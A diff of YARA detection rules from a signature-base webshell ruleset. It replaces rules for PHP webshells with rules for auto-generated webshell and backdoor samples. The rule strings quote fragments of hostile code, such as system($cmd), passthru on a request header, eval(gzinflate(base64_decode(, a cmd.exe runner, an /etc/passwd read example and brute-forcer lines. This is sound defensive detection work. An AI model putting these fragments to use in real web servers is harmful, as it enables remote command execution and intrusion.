+		description = "Webshells Auto-generated - file DarkSpy105.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c424714-1d2c-5b89-b1bc-a201e37a0a5d"
+		id = "9d519ccf-fe52-5b82-a39d-c9f86c1089e1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6156-L6171"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7369-L7380"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "03f6215548ed370bec0332199be7c4f68105274e"
-		logic_hash = "1f65f759ec4045c521085aad84d0aea4dcfcf26eac4357751cf1dde6886d1718"
+		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
+		logic_hash = "0f1c9dba4525f9c30f309500652ed6af647ddf492f483e101fc23c891e15fc85"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
-		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s8 = "system($cmd);" fullword
+		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Moroccan_Spamers_Ma_Edition_By_Ghost
+rule SIGNATURE_BASE_Editserver_EXE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		description = "Webshells Auto-generated - file EditServer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fa9ce70-d300-55fe-bf98-636f026317ec"
+		id = "97928144-0112-5288-8f95-acf7a0d56e71"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6172-L6185"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7381-L7394"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
-		logic_hash = "0e3d2d97665b8849d121d63a22baf7393047a814dde3753e395418c1868b59be"
+		hash = "f945de25e0eba3bdaf1455b3a62b9832"
+		logic_hash = "d440669b0c0bf575cf9dea946edf55f724300a4c765e90c631fc1eee062bf006"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
-		$s12 = "print \"Sending mail to $to....... \"; " fullword
-		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
+		$s2 = "Server %s Have Been Configured"
+		$s5 = "The Server Password Exceeds 32 Characters"
+		$s8 = "9--Set Procecess Name To Inject DLL"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_C99Madshell_V__2_0_Madnet_Edition
+rule SIGNATURE_BASE_FSO_S_Reader
 {
 	meta:
-		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		description = "Webshells Auto-generated - file reader.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51db0495-14f3-527e-865b-1405db57ff27"
+		id = "d596f7f4-5b0d-5f17-94d3-2582ec041eb1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6186-L6201"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7395-L7406"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
-		logic_hash = "7cf825a604783ebc74b1dca53aaff5c886957c562e11276f2acce5ff1f6ab991"
+		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
+		logic_hash = "89a948f8da66173965884cd525615c8eeb91cf98a4984c05be7472034bb72f76"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
-		$s1 = "eval(gzinflate(base64_decode('"
-		$s2 = "$pass = \"\";  //Pass" fullword
-		$s3 = "$login = \"\"; //Login" fullword
-		$s4 = "//Authentication" fullword
+		$s2 = "mailto:mailbomb@hotmail."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Cmdasp_Asp_Php
+rule SIGNATURE_BASE_ASP_Cmdasp
 {
 	meta:
-		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		description = "Webshells Auto-generated - file CmdAsp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "184b1731-31a9-5040-aa25-d145e8064758"
+		id = "e4b48843-1936-5717-b2b6-add5b4a14d04"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6202-L6221"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7407-L7420"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
-		logic_hash = "0fd9c7e83ad9ddf5cf88f1d1573324d9f24ae03a1951446fe11c116fd0cf4932"
+		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
+		logic_hash = "84c3148fe74b1afaa6e3bbff0aca8df1f1775759a36a673cc13d35ef7658929c"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
-		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
-		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
-		$s6 = "' --------------------o0o--------------------" fullword
-		$s8 = "' File: CmdAsp.asp" fullword
-		$s11 = "<-- CmdAsp.asp -->" fullword
-		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
-		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
-		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s2 = "' -- Read the output from our command and remove the temp file -- '"
+		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$s9 = "' -- create the COM objects that we will be using -- '"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_NCC_Shell
+rule SIGNATURE_BASE_KA_Ushell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		description = "Webshells Auto-generated - file KA_uShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a2dab3d-faf0-52a5-b114-db402885c618"
+		id = "34e220db-2fb5-59dc-b5e8-d88f844d3977"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6222-L6238"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7421-L7433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
-		logic_hash = "c58edc548b7804be25f6956e9407cc9f8c74dfd8651f601a87ba639284e612d9"
+		hash = "685f5d4f7f6751eaefc2695071569aab"
+		logic_hash = "58d25e19e2e14a909b4b623a85dfd8c62974121d3b23574d1e94b62385e42b45"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
-		$s1 = "<b>--Coded by Silver" fullword
-		$s2 = "<title>Upload - Shell/Datei</title>" fullword
-		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
-		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
-		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
+		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
+		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_README
+rule SIGNATURE_BASE_PHP_Backdoor_V1
 {
 	meta:
-		description = "PHP Webshells Github Archive - file README.md"
+		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "f47298a9-a47c-5088-ab1f-1bd76bfd0ca8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6239-L6251"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7434-L7447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
-		logic_hash = "aa8a9be74bbac08518d5ba442aa6fa37d3f1b255df48b49ccb9842f5728a49d5"
+		hash = "0506ba90759d11d78befd21cabf41f3d"
+		logic_hash = "396ae1ee34a06ab4863f4f54257a9020b8747fb99dff15372f0aa54fa4598e43"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
-		$s1 = "php-webshells" fullword
+		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
+		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Backupsql
+rule SIGNATURE_BASE_Svchostdll
 {
 	meta:
-		description = "PHP Webshells Github Archive - file backupsql.php"
+		description = "Webshells Auto-generated - file svchostdll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15d6e967-1e53-53b4-a2cf-7786452495d4"
+		id = "b369d702-1f29-56ec-a742-f87d9c42c775"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6252-L6267"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7448-L7467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
-		logic_hash = "0126bfad6eb3861e8322ac3e11b4fd95bc8b88597d916e66c6646d7d5529c1d5"
+		hash = "0f6756c8cb0b454c452055f189e4c3f4"
+		logic_hash = "4a7a7bb7d827c2e7801f8c33b292bb3d312428fc4ae79f07e103f456984c3b83"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
-		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
-		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
-		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
-		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
+		$s0 = "InstallService"
+		$s1 = "RundllInstallA"
+		$s2 = "UninstallService"
+		$s3 = "&G3 Users In RegistryD"
+		$s4 = "OL_SHUTDOWN;I"
+		$s5 = "SvcHostDLL.dll"
+		$s6 = "RundllUninstallA"
+		$s7 = "InternetOpenA"
+		$s8 = "Check Cloneomplete"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_AK_74_Security_Team_Web_Shell_Beta_Version
+rule SIGNATURE_BASE_Hytop_Devpack_Server
 {
 	meta:
-		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		description = "Webshells Auto-generated - file server.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e93a6ac3-080f-53d3-8368-b9feb509a2ea"
+		id = "0e4fee1b-8a16-5738-9600-fa965f8c84c2"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6268-L6281"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7468-L7479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
-		logic_hash = "4fbf8f5cab8593fd88e5a430b849e61d7d663c13700f459aa516c5b337d5438b"
+		hash = "1d38526a215df13c7373da4635541b43"
+		logic_hash = "66b8513a532f64af535c948da28674795ae6495b9844165c3b039bf61c25eb46"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
-		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
-		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+		$s0 = "<!-- PageServer Below -->"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Cpanel
+rule SIGNATURE_BASE_Vanquish
 {
 	meta:
-		description = "PHP Webshells Github Archive - file cpanel.php"
+		description = "Webshells Auto-generated - file vanquish.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "143e5e46-ffbc-5aee-9f9b-13374a6c3c10"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6282-L6298"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7480-L7493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
-		logic_hash = "e4dc90c52648f1e5b7dc2d77dcb94feb774ec9e3c156c923c54a9e8f537bbf07"
+		hash = "684450adde37a93e8bb362994efc898c"
+		logic_hash = "223c59d06a9389f380fa29959c54e53a17b53080f704189ae519b9527b2c6384"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
-		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
-		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
-		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
-		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
-		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
+		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
+		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
+		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Accept_Language
+rule SIGNATURE_BASE_Winshell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file accept_language.php"
+		description = "Webshells Auto-generated - file winshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "343ed2a4-4bed-5e73-8d05-f9573b0147af"
+		id = "24edd03a-df71-5d84-9764-ba7903b68064"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6299-L6310"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7494-L7513"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
-		logic_hash = "6d45071722268f5b39b1486a7dce883ecefb2b3c9993357b7b58bd603ff1c40d"
+		hash = "3144410a37dd4c29d004a814a294ea26"
+		logic_hash = "addbfa598039af09c0e4c50138fcfabd16c35c5516259cf9595cf49855da518d"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
+		$s1 = "WinShell Service"
+		$s2 = "__GLOBAL_HEAP_SELECTED"
+		$s3 = "__MSVCRT_HEAP_SELECT"
+		$s4 = "Provide Windows CmdShell Service"
+		$s5 = "URLDownloadToFileA"
+		$s6 = "RegisterServiceProcess"
+		$s7 = "GetModuleBaseNameA"
+		$s8 = "WinShell v5.0 (C)2002 janker.org"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_529
+rule SIGNATURE_BASE_FSO_S_Remview
 {
 	meta:
-		description = "PHP Webshells Github Archive - file 529.php"
+		description = "Webshells Auto-generated - file remview.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "5040ddbc-2e61-50ca-b738-a4ac8feec3f1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6311-L6328"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7514-L7527"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
-		logic_hash = "f46b84d51077f157c83cd01534dfe7f9cd0d9ef04ad9935ced22d2abc873c171"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+		logic_hash = "19719e8c9215ec9ba9fab55b604907e0a6d0a0507a5662926acff1e9dc03440e"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
-		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
-		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
-		$s10 = "This Exploit Was Edited By KingDefacer" fullword
-		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
-		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
-		$s20 = "while($level--) chdir(\"..\"); " fullword
+		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
+		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
+		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_STNC_Webshell_V0_8
+rule SIGNATURE_BASE_Saphpshell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		description = "Webshells Auto-generated - file saphpshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5dc300a2-9965-52e3-a382-b8d327eb7029"
+		id = "42bcd739-714e-5dbf-a3a1-929f3d16ed6f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6329-L6342"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7528-L7539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
-		logic_hash = "c2067a1b78c441aa05366b612090e0df895c621843038cc9e65beb6719c0cb9a"
+		hash = "d7bba8def713512ddda14baf9cd6889a"
+		logic_hash = "24d558292a709bb29334b1acdc53cdb6c5bc6803caec527edcacd6a19f6dc7c9"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
-		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
-		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
+		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Tryag
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006Z
 {
 	meta:
-		description = "PHP Webshells Github Archive - file tryag.php"
+		description = "Webshells Auto-generated - file 2006Z.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6343-L6358"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7540-L7552"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
-		logic_hash = "2af3bbe8d1940e60843f3f5d40c9c6550e76df21568c374f7a871f73aeefae44"
+		hash = "fd1b6129abd4ab177fed135e3b665488"
+		logic_hash = "4b427132541cd26ee47c387a98f6f46f86808f9a775068e1d114c9ef4abca9f6"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
-		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
-		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
-		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
-		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
+		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
+		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv_2
+rule SIGNATURE_BASE_Admin_Ad
 {
 	meta:
-		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+		description = "Webshells Auto-generated - file admin-ad.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d4a95c4-8128-504d-958f-dcc5c68f4975"
+		id = "7d87b4f6-3227-53cb-803c-4f9c7327f203"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6359-L6374"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7553-L7565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
-		logic_hash = "52dc0449c205ff9105e2dedc3cb4858f83a2efc7bae579656a26da493dc59500"
+		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
+		logic_hash = "0febd10979a959af73332a8e064a510e949109abf863b5fd0fef19b635968d1d"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
-		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
-		$s13 = "header(\"Content-type: image/gif\");" fullword
-		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
-		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
+		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Qsd_Php_Backdoor
+rule SIGNATURE_BASE_FSO_S_Casus15
 {
 	meta:
-		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+		description = "Webshells Auto-generated - file casus15.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8208851-159c-5d0b-91ad-478aeb4fc9fd"
+		id = "305842e4-26ad-573d-8df3-e32e239e434b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6375-L6389"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7566-L7577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
-		logic_hash = "3ef7b67cd60370a99fdfa6fd614f71ee314af27c9d983383dde8f03a127a28b3"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+		logic_hash = "58921290952f23ff5b828d8c92c818ebd91b726cdbbc9137b0f55a0e5ca90636"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
